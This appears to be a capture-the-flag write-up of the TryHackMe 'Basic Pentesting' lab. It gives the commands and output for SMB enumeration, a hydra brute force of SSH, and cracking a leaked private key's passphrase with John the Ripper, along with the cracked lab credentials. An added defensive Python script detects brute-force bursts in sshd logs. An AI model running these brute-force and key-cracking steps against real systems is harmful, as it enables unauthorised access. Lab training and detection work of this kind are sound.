Basic Pentesting
CTF Writeup: Basic Pentesting
Link: TryHackMe | OS: Linux | Difficulty: Easy | Date: 2025-11-08 | Author: S3Z4R
1. Reconnaissance
Nmap Scanning
The Nmap scan shows SMB and SSH services exposed on the target.
Directory Enumeration
Using gobuster to find directories on the web server. [ No Luck Here :) ]
gobuster dir -u http://<Machine-IP> -w directory-list-1.0.txt -x .php
SMB Enumeration
Listing shares on the SMB server.
❯ smbclient -L <Machine-IP> -N
        Sharename       Type      Comment
        ---------       ----      -------
        Anonymous       Disk
Connecting to the anonymous share.
smbclient //<Machine-IP>/Anonymous -N
Inside the share, the command get staff.txt was used to download the file. It revealed two user names: Jan and Kay.
2. Initial Access
Brute-forcing SSH (User Jan)
Using hydra to crack Jan’s SSH password.
❯ hydra -l jan -P kali-wordlists/rockyou.txt ssh://<Machine-IP>
[22][ssh] host: <Machine-IP> login: jan password: armando
3. Privilege Escalation (to User Kay)
After logging in as Jan, a private SSH key (id_rsa) was found in Kay’s home directory, and it was readable by Jan.
Cracking the SSH Key Passphrase
The key was copied and its permissions were restricted, since ssh refuses a private key that is readable by other users.
chmod 600 id_rsa
Attempting to log in with the key revealed it was protected by a passphrase.
ssh -i ~/.ssh/id_rsa kay@<Machine-IP>
ssh2john was used to create a hash of the key.
ssh2john.py id_rsa > id_rsa.hash
John the Ripper was used to crack the hash against a wordlist.
john --wordlist=rockyou.txt id_rsa.hash
The cracked passphrase was beeswax, reported by john as:
beeswax (id_rsa)
Accessing Kay’s Account
Using the private key and the cracked passphrase to log in as Kay (the same ssh -i command as above, entering beeswax at the passphrase prompt).
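From the defender's side, the hydra run in section 2 leaves a dense burst of "Failed password" entries in sshd's auth log, followed by an "Accepted" from the same source, and the later key-based login as Kay comes from that same source too. The Python script below is an added example, not part of the original writeup: it parses constructed sshd log lines (hostname, IP addresses, PIDs and timestamps are made up) and flags both the burst and any login that succeeds from a bursting source afterwards.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample sshd entries in syslog format (not taken from the lab machine).
SAMPLE_AUTH_LOG = """\
Nov  8 10:01:01 target sshd[1201]: Failed password for jan from 10.10.14.5 port 51000 ssh2
Nov  8 10:01:02 target sshd[1202]: Failed password for jan from 10.10.14.5 port 51001 ssh2
Nov  8 10:01:02 target sshd[1203]: Failed password for jan from 10.10.14.5 port 51002 ssh2
Nov  8 10:01:03 target sshd[1204]: Failed password for jan from 10.10.14.5 port 51003 ssh2
Nov  8 10:01:04 target sshd[1205]: Failed password for jan from 10.10.14.5 port 51004 ssh2
Nov  8 10:01:05 target sshd[1206]: Accepted password for jan from 10.10.14.5 port 51005 ssh2
Nov  8 10:01:30 target sshd[1250]: Failed password for invalid user admin from 192.0.2.9 port 40000 ssh2
Nov  8 10:06:00 target sshd[1300]: Accepted publickey for kay from 10.10.14.5 port 51100 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?:password|publickey) for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>\S+) port \d+"
)

def parse(log_text, year=2025):
    """Yield (timestamp, result, user, ip) per auth line; syslog has no year, so one is assumed."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
            yield ts, m["result"], m["user"], m["ip"]

def analyze(log_text, threshold=5, window_seconds=60):
    """Flag sources with >= threshold failures inside one window, and every
    successful login from such a source at or after the start of its burst."""
    failures, successes = defaultdict(list), []
    for ts, result, user, ip in parse(log_text):
        if result == "Failed":
            failures[ip].append(ts)
        else:
            successes.append((ts, user, ip))
    burst_start = {}
    for ip, times in failures.items():
        times.sort()
        for i in range(len(times) - threshold + 1):  # sliding window over sorted failure times
            if (times[i + threshold - 1] - times[i]).total_seconds() <= window_seconds:
                burst_start[ip] = times[i]
                break
    suspicious = sorted((user, ip) for ts, user, ip in successes
                        if ip in burst_start and ts >= burst_start[ip])
    return {"brute_force_sources": {ip: len(failures[ip]) for ip in burst_start},
            "suspicious_logins": suspicious}

if __name__ == "__main__":
    print(analyze(SAMPLE_AUTH_LOG))
```

On the sample, the single failure from 192.0.2.9 stays below the threshold, while both the password login as jan and the later key-based login as kay from 10.10.14.5 are reported.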
4. Final Flag
Once logged in as Kay, the final password was found in pass.bak.
kay@<Machine-IP>:~$ cat pass.bak
here...cy$$